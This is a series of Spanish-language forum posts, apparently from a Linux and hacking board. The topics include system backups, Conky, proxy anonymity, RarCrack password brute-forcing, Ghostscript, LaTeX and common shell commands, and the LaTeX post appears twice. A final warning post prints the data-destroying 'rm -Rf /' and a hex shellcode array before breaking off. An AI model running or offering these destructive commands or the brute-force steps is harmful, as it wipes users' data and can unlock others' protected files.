Y listo. Con eso, se creará un archivo llamado backup.tar.bz2 dentro de dicha carpeta, el cual contiene todo tu sistema. Si querés excluir otros directorios del blackup como por ejemplo el /home, solo agregar "-exclude=/home" al final del comando.

Luego, para recuperar:

Código: text
tar xvpfj backup.tar.bz2 -C /





Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#23

Muy bien primero lo primero que necesitamos instalar Conky, es un echo los comandos para instalar:

En Gentoo :

Código: text
        # emerge -av conky



En Fedora

Código: text
    yum install -y conky



En Ubuntu

Código: text
   sudo apt-get install conky


En Arch

Código: text
    pacman -S conky


Instalacion de Conky y Curl

Me olvide de indicarles instalar:
Código: text

    sudo apt-get install hddtemp



hddtemp nos permite controlar y revisar la temperatura especificamente. le damos en si a todo.. como ya lo instale me da pereza hacerlo :D

En nuestro conky curl para lo que es el RSS

Muy bien luego de instalar que nos queda por hacer ??? facil nos vamos a configurar y crear nuestro .conkyrc el que tendra la configuracion inicial.

Código: text
    sudo gedit .conkyrc



Como se ve, en el gif posteriormente lo que tenemos que hacer es copiar y pegar las configuraciones que deseamos usar. Configuraciones - Conky tenemos varias configuraciones prediseñadas.

Las copiamos y pegamos... luego en una terminal  escribimos :

Código: text
    conky


O bien simplemente alt + f2 y escribimos conky:


Y nos aparecera nuestro conky bien acomodado. Pero al reiniciar o apagar chau conky lo que haremos es ponerlo al inicio.

Código: text
#!/bin/bash
sleep 15
conky
exit 0



Creamos un .startconky en tu home. y pegamos eso recuerden con el . por delante que nos sirve para ocultar.

Y para que se lanze al inicio seguimos lo siguiente.


Y si aun asi somos vagonetas y queremos configuracion echas o bien extraer idea aqui tenemos una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aun mas podemos ir urgando de a poco y nos quedara algo ya depende de ti, el resultado.

Pero si eres de los que tardamos mucho aqui va otras soluciones.

Si no puedes y quieres tener uno como el mio te dejo este paquete con todos los Scripts listos para funcionar.  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta solo descargalo y descomprimelo en tu home.

CTRL + H para que veas los archivos ocultos.


esta es la de los Scripts.

Lanzan el COnky como les indique arriba y listo.. su conky funcionando.


Para que arranque al inicio siguen los pasos normales indicados arriba.
Configuraciones mas faciles...


Simplemente bajen esteNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta y descomprimanlo, ahora con una consola diriganse a la carpeta descomprimida y dentro de ella escriban:

Código: text
   chmod +x install.sh


y luego

Código: text
    ./install.sh


Eso instalara la configuracion de manera automatica.

Ahora para ver el resultado hagan Alt+F2 y escriban:

Código: text
    sh -c "conky -c ~/.conkypatch/conky.conf"


    En Arch deberan agregar el comando en el archivo ~/.xinitrc

Videos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si aun si no pudiste pues dime que te ayudo mas los dos videos que estan en la videoteca subidos para que puedas configurarlos.



Saludos


#24
E-Zines / Revistas Tux Info
Junio 21, 2012, 04:20:45 AM
Todas las revistas de Tux Info lista para la descarga.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos :P
#25
Hacking / [PARTE I] Anonimato en Internet - Teoría
Junio 21, 2012, 04:16:10 AM
En esta oportunidad, escribiré sobre el Anonimato en Internet esta primera parte sera solo teoria si me equivoco en algun punto y talvez mas de uno quisiera que lo digan para asi mejorar y crecer.


1.- Porque no Somos Anónimos en Internet.

El culpable de no ser anónimos en Internet, es  la dirección IP, nuestro Identificador en la red. Por mas que lleguemos a decir solo me conocen por mi Nick Snifer, no ingrese ningun dato que me relacione con mi identidad, no se puede conocer mi ubicación, pero  la IP nos delata, porque todo se queda grabado, almacenado por medio de la geolocalización, esta nos permitira saber de donde es la persona que esta ingresando a la web extrayendo datos. 


Acabas de ser ubicado tengo tu IP


2.-El engaño de ser Anónimos en Internet y como somos Trazables

Desde que comenzó la era de internet, todo se realiza via web es por eso que hay empresas que brindan el servicio para anonimizar la navegación, el cual no existe por la trazabilidad.

La trazabilidad o  rastreabilidad es la "Aptitud para rastrear la historia, la aplicación o la localización de una entidad mediante indicaciones registradas".

Por lo tanto la trazabildiad  que se da cuando nos conectamos a internet, es por medio de un ISP que nos da una direccion ip publica o momentanea a travez de DHCP, a partir de este momento la dirección llega a ser  rastreable.

Por medio del Geotracing, puede saberse  aproximandamente la zona que se creo la conexión.

Esto sucede en sitios como Youtube y Taringa que saben donde estamos y nos llenan de publicidad segun la ubicación dada por la dirección IP.

Fuente: Taringa

Esto recibe el nombre de tecnica de perfilamiento.

Es falso decir que tenemos Banda Ancha y que por ser dinámica nuestra dirección ip, cada N tiempo  cambia o solo con reiniciar el modem no somos trazables, dicha afirmación es mentira porque  el ISP sabe hora y fecha en que  se renovó la dirección del equipo para conectarse a internet.

3.- Los Proxys

Es un ordenador que se interpone en todas nuestras conexiones. Cuando navegamos a través de un proxy todas nuestras conexiones viajan hacia él y luego el proxy las reenvía a los servidores que le indiquemos.


¿Garantiza realmente un proxy nuestra privacidad?

La pregunta del millón dificil de contestarla.


¿Si un proxy está logueando nuestras conexiones  a que se refiere?

Si el proxy loguea nuestras conexiones, alguien puede ver nuestra actividad completa en él. A lo mejor estamos más controlados a través de un proxy si alguien lo está usando para propósitos estadísticos o de espionaje. Entonces alguien desde el proxy podría disponer de datos nuestros muy parecidos a los que tendría nuestro ISP.

Proxys Anonimos


Los proxys anónimos hacen de muro entre el usuario y el servicio al que se quiere acceder. Estos proxys, por tanto, pueden ser plataformas de salto para evitar restricciones y llegar a estos servicios que pueden estar bloqueados por algún país u otro tipo de organización proveyendo la conexión a Internet.

Dentro de este nivel de proxys anónimos existe un nivel superior los que son los Proxys Super-Anonimos. Los cuales se diferencian de los anónimos cuando se realiza una visita a una pagina, el servidor sabe si es anónima la peticion, puesto que es solicitada por el metodo get de las cabeceras http,  al hacer la petición segun el estandar del proxy la cabecera cambia, olvidandonos de http://www quedando solo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Los super anónimos evitan eso, clonando con la IP q es usada en el momento. siendo una conexion transparente desde la casa.

Tambien para evitar que la detección se realize de manera rapida se hace la cadena de proxys.


Ventajas y desventajas:


Ventajas

1.- Mayor anonimato

Desventajas



1.- Conexiones lentas
2.- Si cae un proxy muere todo.


Proteccion con URL anónimas es una especie de servicio dns para las descargas.

La proxima entrega hablare de TOR, mas el uso que se da y explicando como trabaja del mismo modo como configurar para ser supuestamente anónimos.

Saludos :P

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta :(
#26
Buenas a todos como estan bueno para los que no me conocen, ni saben de mi tengo un blog dedicado a compartir libros manuales y tutoriales que tengo por ahora solo tengo ordenados los de Python bueno no son en su totalidad, lo ire actualizando.


Libros de Python
Código: text
1.- Python arsenal for RE.pdf
2.python-no-muerde.pdf
3.python-para-todos.pdf
4.Ejercicios-python.pdf
5.python.pdf
6.Introduccion a la Programacion con Python.pdf
7.[Minitutorial] Libreria Python.pdf
8.a-byte-of-python-for-python-v-2.pdf
9.Aprenda a pensar como un programador con Python.pdf
10.Introducción al Manejo de bases de datos  MySQL en Python by blozzter.pdf
11.python qt.pdf
12.Invent Your own Computer Games with Python.pdf
13.a-byte-of-python-v-1-92-for-python-3.pdf
14.diveintopython-pdf-es-0.1-1


Y en este No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que hay un total de 500 libros mas o menos.

Bueno la forma de solicitar algun libro específicamente, sera en este mismo hilo con el numero, lo cual lo subiré el fin de semana o cuando tenga tiempo un momento.

Formato de Solicitud del libro:

Numero : 10.Introducción al Manejo de bases de datos  MySQL en Python by blozzter.pdf

Saludos :P
#27
Cursos, manuales y libros / [PAPER] Linux Hacking
Junio 18, 2012, 11:32:04 PM
Un paper que encontre en la red del estimado @enriquegmv mas conocido como Comandante Linux. Espero les agrade.


INTRODUCCIÓN 2
SOBRE EL AUTOR: 2
LICENCIA: 3
UN POCO DE HISTORIA SOBRE LINUX 4
GNU/LINUX: CARA Y CRUZ 6
¿QUE SON LAS DISTRIBUCIONES DE GNU/LINUX? 7
DISTRIBUCIONES ORIENTADAS AL HACKING 7
BackTrack 7
Blackbuntu 8
GnackTrack 8
Samurai Web Testing Framework 8
Katana 9
Sumo Linux 9
Wifislax 10
OTRAS DISTRIBUCIONES GNU/LINUX 10
HERRAMIENTAS PARA GNU/LINUX 11
FORMAS DE PRUEBA O INSTALACIÓN 20
Live CD 20
Live USB 21
Herramientas para generar LiveCD o LiveUSB además Maquinas Virtuales 21
Moba Live CD 21
VirtualBox 21
VMWare Player 21
KDE For Windows 21
Fedora LiveUSB creator y UNetBootIn 22
LiLi 22
AGRADECIMIENTO: 22
RECOMENDACIONES: 23
Vídeos 23
Libros 24





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#28
Android / Curso Android
Junio 18, 2012, 11:14:35 PM

Bueno señores les traigo unos cursos de Android este esta totalmente en Español :)




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si cae el link o no se puede acceder me avisas y lo arreglo

Saludos
#29

Espero les agrade a pedido de @enriquegmv :D

ADVERTENCIA LEGAL
Todos los derechos de esta obra están reservados a Grupo EIDOS Consultoría y Documentación Informática, S.L. El editor prohíbe cualquier tipo de fijación, reproducción, transformación, distribución, ya sea mediante venta y/o alquiler y/o préstamo y/o cualquier otra forma de cesión de uso, y/o comunicación pública de la misma, total o parcialmente, por cualquier sistema o en cualquier soporte, ya sea por fotocopia, medio mecánico o electrónico, incluido el tratamiento informático de la misma, en cualquier lugar del universo. El almacenamiento o archivo de esta obra en un ordenador diferente al inicial está expresamente prohibido, así como cualquier otra forma de descarga (downloading), transmisión o puesta a disposición (aún en sistema streaming).
La vulneración de cualesquiera de estos derechos podrá ser considerada como una actividad penal tipificada en los artículos 270 y siguientes del Código Penal.
La protección de esta obra se extiende al universo, de acuerdo con las leyes y convenios internacionales.

Esta obra está destinada exclusivamente para el uso particular del usuario, quedando expresamente prohibido su uso profesional en empresas, centros docentes o cualquier otro, incluyendo a sus empleados de cualquier tipo,
colaboradores y/o alumnos.
Si Vd. desea autorización para el uso
profesional, puede obtenerla enviando un e-mail No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o al fax
(34)-91-5017824.
Si piensa o tiene alguna duda sobre la legalidad de la autorización de la obra, o que la misma ha llegado hasta Vd. vulnerando lo anterior, le agradeceremos que nos lo comunique al e-mail No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o al fax (34)-91-5012824). Esta comunicación será absolutamente confidencial. Colabore contra el fraude. Si usted piensa que esta obra le ha sido de utilidad, pero no se han abonado los
derechos correspondientes, no podremos hacer más obras como ésta.

© Jorge Moratalla, 2001
© Grupo EIDOS Consultaría y Documentación Informática, S.L., 2000

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#30
GNU/Linux / Reduciendo el tamaño de los Pdf's
Abril 02, 2012, 01:34:35 AM
 Acabo de hacer la descarga de UML2 para la tesis, para el desarrollo del software y al verlo pesa mucho. para tenerlo en mi celular ya que caresco de memoria externa en el con sus 6MB me ayuda en lo que puede.

Asi que necesitamos tener instalado Ghotscript y Gsfonts.

Citar
    snifer@snifer:~$ sudo apt-get install ghostscript gsfonts

Con el siguiente comando reduciremos el Pdf:

Código: text

    snifer@snifer:~$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=UMLnuevo.pdf PDF UML.pdf


Cuanto reduje de 3 Mb a 365 kb. Claro que la calidad baja pero sirve.

Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#31

Como sacar la contraseña de un rar que no sabemos la pregunta me la hizo mi amigo @enriquegmv xD asi que me puse a hacer la entrada espero les agrade :D

Lo que hacemos es descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta luego las estimadas dependecias
Primero las queridas dependencias

Código: text


    snifer@snifer:/$ sudo apt-get install libxml2-dev


Por comodidad luego de descargarlo nos vamos donde lo tenemos yo lo lleve al escritorio para facilitarme las vida.

Código: text
    snifer@snifer:~/Escritorio$ tar xvjf rarcrack-0.2.tar.bz2 


Entramos al directorio

Código: text
    snifer@snifer:~/Escritorio$ cd rarcrack-0.2/


Lo que sigue es hacer el make y make install

   
Código: text
    snifer@snifer:~/Escritorio/rarcrack-0.2$ make

        snifer@snifer:~/Escritorio/rarcrack-0.2$ sudo make install


Lo que hacemos es meternos a la carpeta usando el siguiente comando:
Código: text

    rarcrack [y la ubicacion del archivo comprimido]


Asi de este modo


Código: text
    snifer@snifer:~$ rarcrack /home/snifer/Escritorio/Sacando_un_pass.zip 




Al probar me dio error :( y si evidentemente un error violación de segmento el motivo es porque no me reconocio la extensión que le di del archivo.

Tenemos que agregar al final el tipo de extensión
Código: text

    --type rar o --type zip o --type 7z



Luego solo nos queda esperar, y lo que hace es crear un archivo xml en el caso de que falle, y volver a intentarlo tuve que esperar como 10 minutos para que de :D



EXTRA
Código: text
$ sudo rarcrack archivo.ext [--threads num] [--type rar | zip | 7z]



Todo lo que esta entre "[" y "]" son parámetros opcionales, por defecto RarCrack detecta solo el tipo de archivo.

EXPLICANDO EL FUNCIONAMIENTO

Ahora viene lo bonito que no se me da muy bien a explicar como funciona a mi buen entender.

Para encontrar la clave RarCrack realiza un ataque por fuerza bruta al archivo comprimido.

El número de threads debe estar entre 1 y 12, ambos inclusive. Según mi entender, es las veces probadas de contraseña por segundo yo solo hice la prueba hasta 2 por segundo :D

¿PORQUE LA DEPENDENCIA?

La dependencia con el paquete libxml2-dev tiene su explicación en que, a medida que va probando contraseñas, guarda el estado por el que va en un fichero XML.

De esta forma, es posible interrumpir la ejecución en cualquier momento pulsando CTRL+C y seguir en otro momento o, incluso, en otro ordenador diferente.

La estructura de un fichero de estado XML cualquiera es la siguiente:



Después de que el agrietamiento comenzó RarCrack imprimirá el estado actual de la fisuración y guardarlo en un archivo de estado. Si desea más contraseña conjunto de caracteres específicos, es necesario ejecutar RarCrack para crear el archivo de estado XML (3 segundos).
Código: text

#RECUPERANDO CONTRASEÑAS DE RAR ZIP 7Z DESDE CONSOLA
#http://sniferl4bs.blogspot.com/2011/10/recuperando-el-pasword-rar-zip-7z-desde.html
#http://sniferl4bs.blogspot.com
#http://biblioteca-sniferl4bs.blogspot.com
<? Xml version = "1.0" encoding = "UTF-8"?> <rarcrack> <abc> 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ </ abc> <actual> s3145</ corriente> <good_password> </ good_password> </ rarcrack>


Es un archivo XML de ejemplo, y ver que hay un conjunto de caracteres. Si lo desea, puede modificar este archivo y al iniciar RarCrack nuevo el programa será el uso de nuevas variables.



Espero les agrade Saludos :P

Fuente:SniferL4bs
#32
De echo que si vienes de Window$ y andas acostumbrado a Total Commander si para hacer la copia de datos rapida, mal dicho verdad que es usada para la gestión de ficheros, ahora si en Linux tenemos la misma opción tanto como forma grafica tan parecido al TotalCommander.


Pero esta vez, no veremos ninguno de ese modo, mas bien comenzare a explicar la instalación y el uso de Midnigth Commander (MC). Asi te evitas hacer el uso de la shell con cp y demas.

Que es Midnight Commander

El Midnight Commader de Linux, es un entorno amigable en modo texto que nos ayudará a hacer las gestiones de ficheros que normalmente usamos, para ejecutar el Midnight Commander si no lo tenemos instalado

Código: text
    snifer@snifer:~$ sud apt-get install mc



Con mc instalamos a nuestro querido Commander.

Luego para llamarlo y ejecutar hacemos simplemente

Código: text
    snifer@snifer:~$ mc



y listo asi se ve nuestro querido .. cabe destacar que varios, programas como el TC esta basado en mc ¬¬ lastima que es usado y vendido.

Espero les guste.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#33
GNU/Linux / Lector de RSS en Conky
Abril 02, 2012, 01:29:52 AM
Me puse a ver un poco de conky y grata fue la sorpresa al ver que ya hay el script.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero no pude hacerlo funcionar jajaja.

La solucion meter mano .. y modificar asi que me quedo esto :


Ya que el caballero alex me trajo para aqui estare posteando mas cosillas

El codigo es el siguiente :


Código: text
{color}${color }${rss http://foro.infiernohacker.com/index.php?type=rss 5 feed_title} #Con esto sacamos el titulo :D
${color}? ${color }${rss  http://foro.infiernohacker.com/index.php?type=rss 5 item_title 0}
${color}? ${color }${rss  http://foro.infiernohacker.com/index.php?type=rss 5 item_title 1}
${color}? ${color }${rss  http://foro.infiernohacker.com/index.php?type=rss 5 item_title 2}

Espero les guste solo es cambiar la direccion.
#34
GNU/Linux / Python highlighting en LaTeX
Abril 02, 2012, 01:27:05 AM
Bueno hace dias estaba con este problema de poder  presentar de manera adecuada, el codigo para la  presentación final de la tesis, y sacar las copias que sean necesarias para la entrega, y listo asi que me la pase investigando hasta que di con Pythonhighlight  el cual me permite colorear por asi decirlo, código en Python, es verdad que existe el paquete  listings que si logra trabajar con lstlisting nos permite trabajar con varios códigos los cuales son:

CitarABAP (R/2 4.3, R/2 5.0, R/3 3.1, R/3 4.6C, R/3 6.10), ACSL Ada (83, 95), Algol (60, 68), Ant, Assembler (x86masm), Awk (gnu, POSIX), bash, Basic (Visual), C (ANSI, Handel, Objective, Sharp), C++ (ANSI, GNU, ISO, Visual), Caml (light, Objective), Clean, Cobol (1974, 1985, ibm), Comal 80, csh, Delphi, Ei?el, Elan, erlang, Euphoria, Fortran (77, 90, 95), GCL, Gnuplot, Haskell, HTML, IDL (empty, CORBA), inform, Java (empty, AspectJ), JVMIS, ksh, Lisp (empty, Auto), Logo, make (empty, gnu), Mathematica (1.0, 3.0), Matlab, Mercury, MetaPost, Miranda, Mizar, ML, Modula-2, MuPAD, NASTRAN, Oberon-2, OCL (decorative, OMG), Octave, Oz, Pascal (Borland6, Standard, XSC), Perl,PHP, PL/I,Plasm, POV,Prolog, Promela,Python, R,Reduce, Rexx,RSL, Ruby, S (empty, PLUS), SAS, Scilab, sh, SHELXL, Simula (67, CII, DEC, IBM), SQL, tcl (empty, tk), TeX (AlLaTeX, common, LaTeX, plain, primitive), VBScript, Verilog, VHDL (empty, AMS), VRML (97), XML, XSLT.


Pero bueno no necesito todo eso ¬¬ ademas, no entiendo porque pero no puedo hacer dar el paquete bien jejeje, lo que hacemos para poder usar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es descargarlo para usar solo código Python, luego abrimos una terminal y ejecutamos lo siguiente:


Código: text
snifer@snifer:~$ sudo mkdir /usr/share/texmf/tex/latex/pythonhighlight



Luego realizamos la copia del archivo Descargado en la carpeta creada:

Código: text

snifer@snifer:~/Descargas$ sudo cp pythonhighlight.sty /usr/share/texmf/tex/latex/pythonhighlight


Ahora lo que toca es re-configurar LaTeX para que tenga constancia del nuevo paquete para eso usamos el siguiente comando:

Código: text
snifer@snifer:$ sudo texhash 


Y listo ya lo tenemos instalado, para usar hacemos lo siguiente incluir el paquete para que se pueda hacer uso de el.

Código: text
% El paquete que hemos instalado y debemos usar para que quede bonito =)
\usepackage{pythonhighlight}


Para hacer uso de el  ponemos entre \begin{python}  y \end{python}  el código que queremos resaltar.



Luego de compilar nos da el siguiente resultado.


Mas elegante verdad, por si quieren ver el código de LaTeXNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta lo pueden descargar.

Bueno luego de esto note algo importante que en el desarrollo del documento hago uso de algunas parte de codigo que toca especificar como por ejemplo:


Los métodos __init__ pueden tomar cualquier cantidad de argumentos, e igual que las funciones, éstos pueden definirse con valores por defecto, haciéndoles opcionales para quien invoca.
Lo que me toca resaltar es __init__ usamos de la siguiente manera anteponiendo al codigo de Python que deseamos resaltar \pyth{} teniendo como resultado:


Uso de pyth{}

Bueno eso es todo espero les agrade, esta entrada y a seguir trabajando con LaTeX.

Bueno hace dias estaba con este problema de poder  presentar de manera adecuada, el codigo para la  presentación final de la tesis, y sacar las copias que sean necesarias para la entrega, y listo asi que me la pase investigando hasta que di con Pythonhighlight  el cual me permite colorear por asi decirlo, código en Python, es verdad que existe el paquete  listings que si logra trabajar con lstlisting nos permite trabajar con varios códigos los cuales son:

CitarABAP (R/2 4.3, R/2 5.0, R/3 3.1, R/3 4.6C, R/3 6.10), ACSL Ada (83, 95), Algol (60, 68), Ant, Assembler (x86masm), Awk (gnu, POSIX), bash, Basic (Visual), C (ANSI, Handel, Objective, Sharp), C++ (ANSI, GNU, ISO, Visual), Caml (light, Objective), Clean, Cobol (1974, 1985, ibm), Comal 80, csh, Delphi, Ei?el, Elan, erlang, Euphoria, Fortran (77, 90, 95), GCL, Gnuplot, Haskell, HTML, IDL (empty, CORBA), inform, Java (empty, AspectJ), JVMIS, ksh, Lisp (empty, Auto), Logo, make (empty, gnu), Mathematica (1.0, 3.0), Matlab, Mercury, MetaPost, Miranda, Mizar, ML, Modula-2, MuPAD, NASTRAN, Oberon-2, OCL (decorative, OMG), Octave, Oz, Pascal (Borland6, Standard, XSC), Perl,PHP, PL/I,Plasm, POV,Prolog, Promela,Python, R,Reduce, Rexx,RSL, Ruby, S (empty, PLUS), SAS, Scilab, sh, SHELXL, Simula (67, CII, DEC, IBM), SQL, tcl (empty, tk), TeX (AlLaTeX, common, LaTeX, plain, primitive), VBScript, Verilog, VHDL (empty, AMS), VRML (97), XML, XSLT.


Pero bueno no necesito todo eso ¬¬ ademas, no entiendo porque pero no puedo hacer dar el paquete bien jejeje, lo que hacemos para poder usar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es descargarlo para usar solo código Python, luego abrimos una terminal y ejecutamos lo siguiente:


Código: text
snifer@snifer:~$ sudo mkdir /usr/share/texmf/tex/latex/pythonhighlight



Luego realizamos la copia del archivo Descargado en la carpeta creada:

Código: text

snifer@snifer:~/Descargas$ sudo cp pythonhighlight.sty /usr/share/texmf/tex/latex/pythonhighlight


Ahora lo que toca es re-configurar LaTeX para que tenga constancia del nuevo paquete para eso usamos el siguiente comando:

Código: text
snifer@snifer:$ sudo texhash 


Y listo ya lo tenemos instalado, para usar hacemos lo siguiente incluir el paquete para que se pueda hacer uso de el.

Código: text
% El paquete que hemos instalado y debemos usar para que quede bonito =)
\usepackage{pythonhighlight}


Para hacer uso de el  ponemos entre \begin{python}  y \end{python}  el código que queremos resaltar.



Luego de compilar nos da el siguiente resultado.


Mas elegante verdad, por si quieren ver el código de LaTeXNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta lo pueden descargar.

Bueno luego de esto note algo importante que en el desarrollo del documento hago uso de algunas parte de codigo que toca especificar como por ejemplo:


Los métodos __init__ pueden tomar cualquier cantidad de argumentos, e igual que las funciones, éstos pueden definirse con valores por defecto, haciéndoles opcionales para quien invoca.
Lo que me toca resaltar es __init__ usamos de la siguiente manera anteponiendo al codigo de Python que deseamos resaltar \pyth{} teniendo como resultado:


Uso de pyth{}

Bueno eso es todo espero les agrade, esta entrada y a seguir trabajando con LaTeX.

Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35
GNU/Linux / Comandos Utiles
Abril 02, 2012, 01:25:04 AM
Talvez a alguien le sirva aun mas is recien entra al mundo de tux XD


---- Adept ----
- Reparar adept:
Código: text
sudo dpkg --configure -a


- Actualizar adept:
Código: text
sudo apt-get update
sudo apt-get upgrade


- Adept completo:

Código: text
sudo apt-get update && sudo apt-get upgrade && sudo apt-get autoremove && sudo apt-get purge   


---- Paquetes .deb ----
- Convertir unpaquete .rpm a .deb:
alien <nombre del paquete>

- Instalar un .deb:
Código: text
sudo dpkg -i <nombre del paquete>


- Desistalar un .deb:
Código: text
sudo dpkg -r <nombre del paquete>


- Ver todos los paquetes instalados:
Código: text
dpkg -l | grep ii | more


---- Instalar un .bin ----
Código: text
chmod +x <nombre del paquete>
./<nombre del paquete>


---- Purgar kernel ----
Código: text
sudo dpkg -l | grep linux-image
sudo aptitude purge linux-image-2.6.27-11-generic            -- Aqui el que toque
sudo aptitude purge linux-headers-2.6.27-11-generic         -- Aqui el que toque


---- Ver estado salud bateria ----
Código: text
cat /proc/acpi/battery/BAT0/info


---- Reparar Grub ----
Código: text
 sudo grub                --> ejecutamos el interprete de comando de grub
find /boot/grub/stage1   --> busca donde esta la partición de ubuntu
root (hdX,Y)             --> poner el valor devuelto anterior
setup (hd0)              --> instala grub en nuestro primer disco duro (hd0),
                               que es con el que inicia la computadora
quit                     --> salimos del interprete de comando de grub


---- Resetear servidor grafico -----
Código: text
sudo dpkg-reconfigure -phigh xserver-xorg


---- Listar procesos ----
Código: text
ps -aux


---- Temporizador -----
Código: text
sleep <tiempo a esperar (10m o 10s por ejemplo)>;<orden a realizar (killall amarok)>


---- Ver espacio vacio libre discos -----
Código: text
df -h

---- Formatear un USB ----
Código: text
dmesg
umount /dev/sdb1
sudo mkfs.vfat /dev/sdb1


---- Ver dispositivos USB ----
Código: text
lsusb


---- Ver dispositivos pci ----
Código: text
lspci


---- Buscar archivos ----
Código: text
sudo find /  -name 'nombre_archivo'


---- Apagar monitor ----
Código: text
xset dpms force off


---- Saber donde esta instalado un programa ----
Código: text
whereis <nombre del programa>


---- Listar comandos introducidos terminal ----
Código: text
history


---- Listar ultimos comandos historial ----
Código: text
fc -l


---- Ejecutar el ultimo comando que contenga la cadena de texto elegida ----
Código: text
	!cadena

ejemplo
Código: text
	!nano


---- Borrar desde la posicion actual al principio de la linea ----
Código: text
ctrl + u


---- Borrar desde la posicion actual al principio de la palabra ----
Código: text
ctrl + w


---- Directorio actual ----
Código: text
pwd


---- Reparar claves GPG ----
Error:
Código: text

W: Error de GPG: http://repo.offensive-security.com binary/ Release Las firmas siguientes no se pudieron verificar porque su llave pública no está disponible: NO_PUBKEY 720DB78AE5513C11     


Para solucionar esto tenemos que coger las 8 ultimas cifras de la clave errónea, en este caso, E5513C11
y entonces ponemos:
Código: text
gpg --keyserver keyserver.ubuntu.com --recv E5513C11

y la salida será:
Código: text

aetsu@aetsu-pc:~/wire$ gpg --keyserver keyserver.ubuntu.com --recv E5513C11                                                                                     
gpg: solicitando clave E5513C11 de hkp servidor keyserver.ubuntu.com                                                                                             
gpg: clave E5513C11: clave pública "BackTrack Development Team <[email protected]>" importada                                                             
gpg: Cantidad total procesada: 1                                                                                                                                 
gpg:               importadas: 1     

Por último queda poner:
Código: text
gpg --export --armor E5513C11 | sudo apt-key add -

y la salida sera:
Código: text

aetsu@aetsu-pc:~/wire$ gpg --export --armor E5513C11 | sudo apt-key add -                                                                                       
OK 

Con esto ya podeis hacer un
Código: text
sudo apt-get update


--> Limpiar Terminal <--

Código: text
clear


--> Conocer el Hardware del Equipo <--

Código: text
sudo lshw


Compilar programas en c

Código: text
gcc -o programa_salida codigo_fuente.c

Autor: aetsu
Saludos :P
#36
GNU/Linux / Los 7 Comandos De La Muerte en Linux
Abril 02, 2012, 01:22:16 AM
Los 7 Comandos De La Muerte en Linux

Bueno yo cometi varios de estos en mi lap :D si si con datos y todo TROLL mayor  8)

 
Código: text
  # rm -Rf /


Este comando eliminará a la fuerza y recursivamente (incluyendo subdirectorios), todos los archivos dentro del directorio raíz.

Código: text
   char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
